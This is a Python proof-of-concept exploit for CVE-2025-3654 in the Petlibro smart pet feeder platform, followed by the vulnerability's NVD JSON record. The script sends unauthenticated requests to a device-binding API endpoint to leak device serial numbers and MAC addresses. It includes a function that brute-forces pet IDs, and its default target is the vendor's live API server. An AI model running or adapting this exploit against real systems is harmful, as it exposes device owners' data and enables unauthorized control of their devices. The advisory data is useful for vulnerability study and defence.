CVE-2025-3654

import requests import json # CVE-2025-3654 PoC - Petlibro Smart Pet Feeder Information Disclosure # Target: Petlibro Smart Pet Feeder Platform <= 1.7.31 def exploit_cve_2025_3654(target_url, pet_id): """ Exploit for CVE-2025-3654 Information Disclosure via /api/device/devicePetRelation/getBoundDevices Args: target_url: Base URL of the Petlibro API server pet_id: Valid pet ID to query device information Returns: dict: Device information including serial numbers and MAC addresses """ endpoint = f"{target_url}/api/device/devicePetRelation/getBoundDevices" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Petlibro/1.7.31' } payload = { 'petId': pet_id } try: # Send unauthenticated request to leak device information response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Successfully retrieved device information for pet_id: {pet_id}") print(f"[+] Response: {json.dumps(data, indent=2)}") return data else: print(f"[-] Request failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return None def enumerate_pet_ids(target_url, start_id=1, end_id=1000): """ Enumerate pet IDs to find valid IDs for exploitation """ print(f"[*] Enumerating pet IDs from {start_id} to {end_id}") for pet_id in range(start_id, end_id + 1): result = exploit_cve_2025_3654(target_url, str(pet_id)) if result and result.get('code') == 0: print(f"[+] Found valid pet_id: {pet_id}") return pet_id return None # Example usage if __name__ == "__main__": # Replace with actual target URL target = "https://api.petlibro.com" # Method 1: Direct exploitation with known pet_id print("=" * 50) print("CVE-2025-3654 PoC - Petlibro Information Disclosure") print("=" * 50) # Known pet ID pet_id = "123456" device_info = exploit_cve_2025_3654(target, pet_id) # Method 2: Enumerate pet IDs # valid_id = enumerate_pet_ids(target, 1, 10000)

{"cve": {"id": "CVE-2025-3654", "sourceIdentifier": "[email protected]", "published": "2026-01-04T00:15:44.273", "lastModified": "2026-02-03T17:36:31.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to device hardware information by exploiting insecure API endpoints. Attackers can retrieve device serial numbers and MAC addresses through /device/devicePetRelation/getBoundDevices using pet IDs, enabling full device control without proper authorization checks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-612"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:*", "versionEndIncluding": "1.7.31", "matchCriteriaId": "0B604E0A-05A3-46E0-8558-FF3F00F5EF0D"}]}]}], "references": [{"url": "https://bobdahacker.com/blog/petlibro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-information-disclosure-via-api-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}